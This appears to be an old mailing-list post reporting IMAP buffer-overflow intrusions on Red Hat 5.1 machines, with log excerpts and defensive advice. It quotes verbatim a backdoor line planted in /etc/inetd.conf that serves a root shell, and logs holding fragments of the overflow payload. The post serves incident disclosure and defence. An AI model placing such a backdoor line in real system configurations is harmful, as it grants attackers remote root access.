Daniel Senie wrote:
The frequency of IMAP attacks is increasing, and the number of IP addresses scanned per attack seems to be increasing as well. In the last 24 hours, I've been scanned by:
fermi.math.csi.cuny.edu c149.lib.uci.edu sockeye.cob.calpoly.edu quebec.upa.qc.ca
Anyone upstream of any of these able to add a Sniffer? It'd be interesting to see if someone is connected in via telnet or ssh and launching the attacks remotely. With all of these types of attack in the last several days, the systems doing the attacking have all been ones that were compromised.
I found a machine that had Red Hat 5.1 unmodified running on it, and it got hit. So I closed things off and looked around for damage and found the following: 1. Syslogd had been killed off and the syslog file deleted. 2. A backdoor was installed in /etc/inetd.conf as follows: ttalk stream tcp nowait root /bin/sh sh -i I've temporarily added filters to block TCP ports 143 and 666 coming in to my network (will have to open 143 back up if any of my customers are using IMAP to their own servers from outside, but we don't do IMAP, yet, so it's not an impact on me). Whether or not it is practical to do it on your network is something you'll have to figure out. But I would check any machines you have that might be at risk for these intrusion signatures. I can't imagine any reason anyone would execute any shell from inetd, so if you find /bin/*sh in inetd.conf, worry (and take it out). I don't know if these attacks are specific to Red Hat Linux or if other UNIX systems are at risk. My Sparc/Linux box logged at attempted attack that failed, possibly because the architecture wouldn't run the binary code the attacker put in the buffer overflow. This is what I found in the log (times are CST with NTP running): Nov 20 14:55:07 rigel pam[6172]: pam_get_user: no username obtained Nov 20 14:55:56 rigel imapd[6174]: System break-in attempt, host=1Cust149.tnt1.new-york.ny.da.uu.net [208.250.139.149] Nov 20 14:55:56 rigel Nov 20 14:55:56 rigel syslogd: Cannot glue message parts together Nov 20 14:55:56 rigel 22>Nov 20 14:55:56 imapd[6174]: AUTHENTICATE ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P! ! ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P Nov 20 14:55:56 rigel ^IF^L0^K^Is^MN^H^MV^LM Nov 20 15:16:43 rigel imapd[6209]: System break-in attempt, host=usr3-20.gdi.net [209.26.33.148] Nov 20 15:16:43 rigel syslogd: Cannot glue message parts together Nov 20 15:16:44 rigel ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^Pk8^ -- -- *-----------------------------* Phil Howard KA9WGN * -- -- | Inturnet, Inc. | Director of Internet Services | -- -- | Business Internet Solutions | eng at intur.net | -- -- *-----------------------------* philh at intur.net * --